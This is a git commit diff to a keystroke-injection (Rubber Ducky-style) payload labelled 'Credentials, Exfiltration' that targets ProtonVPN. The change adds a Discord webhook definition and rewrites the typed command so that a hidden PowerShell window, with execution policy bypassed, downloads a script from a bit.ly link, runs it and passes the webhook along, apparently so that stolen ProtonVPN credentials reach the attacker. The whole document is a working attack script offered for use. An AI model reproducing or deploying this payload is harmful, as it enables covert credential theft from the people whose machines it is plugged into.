DEFINE Discord Webhook

pull/207/head
Alessandro 2023-01-11 19:53:16 +01:00 committed by GitHub
parent df9946e100
commit a37db33c40
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 1 deletions

View File

@ -27,8 +27,14 @@ REM Category: Credentials, Exfiltration
REM Requirements: ProtonVPN user logged at least one time and internet connection REM Requirements: ProtonVPN user logged at least one time and internet connection
REM REM
REM REQUIRED - Provide your url WEBHOOK
DEFINE WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
DELAY 2000 DELAY 2000
GUI r GUI r
DELAY 250 DELAY 250
STRINGLN powershell -w h -ep bypass $discord='<your-wehbook-here>';irm bit.ly/ProtonVPN-config-raw | iex DELETE
STRING powershell -w h -ep bypass $discord='
STRING WEBHOOK
STRING ';irm bit.ly/ProtonVPN-config-raw | iex
ENTER